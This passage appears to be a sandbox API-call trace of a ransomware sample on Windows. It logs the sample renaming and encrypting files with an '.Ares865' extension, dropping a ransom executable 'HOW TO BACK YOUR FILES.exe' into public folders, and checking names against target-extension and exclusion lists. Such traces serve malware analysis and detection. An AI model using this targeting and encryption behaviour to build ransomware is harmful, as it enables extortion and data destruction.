lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0056.275] lstrlenW (lpString="trc") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0056.275] lstrlenW (lpString="trc") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0056.275] lstrlenW (lpString="trm") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0056.275] lstrlenW (lpString="udb") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0056.275] lstrlenW (lpString="udl") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0056.275] lstrlenW (lpString="usr") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0056.275] lstrlenW (lpString="v12") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0056.275] lstrlenW (lpString="vis") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0056.275] lstrlenW (lpString="vpd") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0056.275] lstrlenW (lpString="vvv") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0056.275] lstrlenW (lpString="wdb") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0056.275] lstrlenW (lpString="wmdb") returned 4 [0056.275] lstrcmpiW (lpString1="y-ms", lpString2="wmdb") returned 1 [0056.275] lstrlenW (lpString="wrk") returned 3 [0056.276] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0056.276] lstrlenW (lpString="xdb") returned 3 [0056.276] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0056.276] lstrlenW (lpString="xld") returned 3 [0056.276] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0056.276] lstrlenW (lpString="xmlff") returned 5 [0056.276] lstrcmpiW (lpString1="ry-ms", lpString2="xmlff") returned -1 [0056.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Ares865") returned 55 [0056.276] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Ares865" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.ares865"), dwFlags=0x1) returned 1 [0056.276] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Ares865" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0056.276] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=876) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.277] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0056.277] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0056.278] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.278] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x670, lpName=0x0) returned 0x12c [0056.280] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x670) returned 0x190000 [0056.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0056.281] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0056.281] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.282] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.282] CloseHandle (hObject=0x12c) returned 1 [0056.282] CloseHandle (hObject=0x15c) returned 1 [0056.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.284] FindNextFileW (in: hFindFile=0x2cce28, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0056.284] FindClose (in: hFindFile=0x2cce28 | out: hFindFile=0x2cce28) returned 1 [0056.284] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0056.284] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Favorites", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0056.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccde8 | out: hHeap=0x2b0000) returned 1 [0056.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0056.284] lstrlenW (lpString="C:\\Users\\Public\\Favorites") returned 25 [0056.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0056.284] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.284] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Favorites\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\favorites\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.284] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.285] GetLastError () returned 0x20 [0056.285] Sleep (dwMilliseconds=0xc8) [0056.482] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0056.482] GetLastError () returned 0x0 [0056.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.482] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.482] CloseHandle (hObject=0x154) returned 1 [0056.482] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.482] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.482] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.482] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.482] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.483] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.483] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0056.483] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.483] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.483] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498632e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.483] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.483] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498632e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0056.483] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0056.483] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0056.483] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Downloads", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0056.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccda8 | out: hHeap=0x2b0000) returned 1 [0056.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0056.483] lstrlenW (lpString="C:\\Users\\Public\\Downloads") returned 25 [0056.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0056.483] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.483] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Downloads\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\downloads\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.483] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0056.484] GetLastError () returned 0x0 [0056.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.484] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.484] CloseHandle (hObject=0x154) returned 1 [0056.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.484] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.484] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49889440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.484] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.484] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.484] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.484] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49889440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.484] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.484] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0056.484] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.484] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.484] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0056.484] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0056.485] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0056.485] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0056.485] lstrlenW (lpString="desktop.ini") returned 11 [0056.485] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\*") returned 27 [0056.485] lstrcpyW (in: lpString1=0x2cce434, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0056.485] lstrlenW (lpString="desktop.ini") returned 11 [0056.485] lstrlenW (lpString="Ares865") returned 7 [0056.485] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0056.485] lstrlenW (lpString=".dll") returned 4 [0056.485] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0056.485] lstrlenW (lpString=".lnk") returned 4 [0056.485] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0056.485] lstrlenW (lpString=".ini") returned 4 [0056.485] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0056.485] lstrlenW (lpString=".sys") returned 4 [0056.485] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0056.485] lstrlenW (lpString="desktop.ini") returned 11 [0056.485] lstrlenW (lpString="bak") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0056.485] lstrlenW (lpString="ba_") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0056.485] lstrlenW (lpString="dbb") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0056.485] lstrlenW (lpString="vmdk") returned 4 [0056.485] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0056.485] lstrlenW (lpString="rar") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0056.485] lstrlenW (lpString="zip") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0056.485] lstrlenW (lpString="tgz") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0056.485] lstrlenW (lpString="vbox") returned 4 [0056.485] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0056.485] lstrlenW (lpString="vdi") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0056.485] lstrlenW (lpString="vhd") returned 3 [0056.485] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0056.486] lstrlenW (lpString="vhdx") returned 4 [0056.486] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0056.486] lstrlenW (lpString="avhd") returned 4 [0056.486] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0056.486] lstrlenW (lpString="db") returned 2 [0056.486] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0056.486] lstrlenW (lpString="db2") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0056.486] lstrlenW (lpString="db3") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0056.486] lstrlenW (lpString="dbf") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0056.486] lstrlenW (lpString="mdf") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0056.486] lstrlenW (lpString="mdb") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0056.486] lstrlenW (lpString="sql") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0056.486] lstrlenW (lpString="sqlite") returned 6 [0056.486] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0056.486] lstrlenW (lpString="sqlite3") returned 7 [0056.486] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0056.486] lstrlenW (lpString="sqlitedb") returned 8 [0056.486] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0056.486] lstrlenW (lpString="xml") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0056.486] lstrlenW (lpString="$er") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0056.486] lstrlenW (lpString="4dd") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0056.486] lstrlenW (lpString="4dl") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0056.486] lstrlenW (lpString="^^^") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0056.486] lstrlenW (lpString="abs") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0056.486] lstrlenW (lpString="abx") returned 3 [0056.486] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0056.487] lstrlenW (lpString="accdb") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0056.487] lstrlenW (lpString="accdc") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0056.487] lstrlenW (lpString="accde") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0056.487] lstrlenW (lpString="accdr") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0056.487] lstrlenW (lpString="accdt") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0056.487] lstrlenW (lpString="accdw") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0056.487] lstrlenW (lpString="accft") returned 5 [0056.487] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0056.487] lstrlenW (lpString="adb") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0056.487] lstrlenW (lpString="adb") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0056.487] lstrlenW (lpString="ade") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0056.487] lstrlenW (lpString="adf") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0056.487] lstrlenW (lpString="adn") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0056.487] lstrlenW (lpString="adp") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0056.487] lstrlenW (lpString="alf") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0056.487] lstrlenW (lpString="ask") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0056.487] lstrlenW (lpString="btr") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0056.487] lstrlenW (lpString="cat") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0056.487] lstrlenW (lpString="cdb") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0056.487] lstrlenW (lpString="ckp") returned 3 [0056.487] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0056.488] lstrlenW (lpString="cma") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0056.488] lstrlenW (lpString="cpd") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0056.488] lstrlenW (lpString="dacpac") returned 6 [0056.488] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0056.488] lstrlenW (lpString="dad") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0056.488] lstrlenW (lpString="dadiagrams") returned 10 [0056.488] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0056.488] lstrlenW (lpString="daschema") returned 8 [0056.488] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0056.488] lstrlenW (lpString="db-journal") returned 10 [0056.488] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0056.488] lstrlenW (lpString="db-shm") returned 6 [0056.488] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0056.488] lstrlenW (lpString="db-wal") returned 6 [0056.488] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0056.488] lstrlenW (lpString="dbc") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0056.488] lstrlenW (lpString="dbs") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0056.488] lstrlenW (lpString="dbt") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0056.488] lstrlenW (lpString="dbv") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0056.488] lstrlenW (lpString="dbx") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0056.488] lstrlenW (lpString="dcb") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0056.488] lstrlenW (lpString="dct") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0056.488] lstrlenW (lpString="dcx") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0056.488] lstrlenW (lpString="ddl") returned 3 [0056.488] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0056.488] lstrlenW (lpString="dlis") returned 4 [0056.488] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0056.489] lstrlenW (lpString="dp1") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0056.489] lstrlenW (lpString="dqy") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0056.489] lstrlenW (lpString="dsk") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0056.489] lstrlenW (lpString="dsn") returned 3 [0056.489] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0056.489] lstrlenW (lpString="dtsx") returned 4 [0056.489] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned 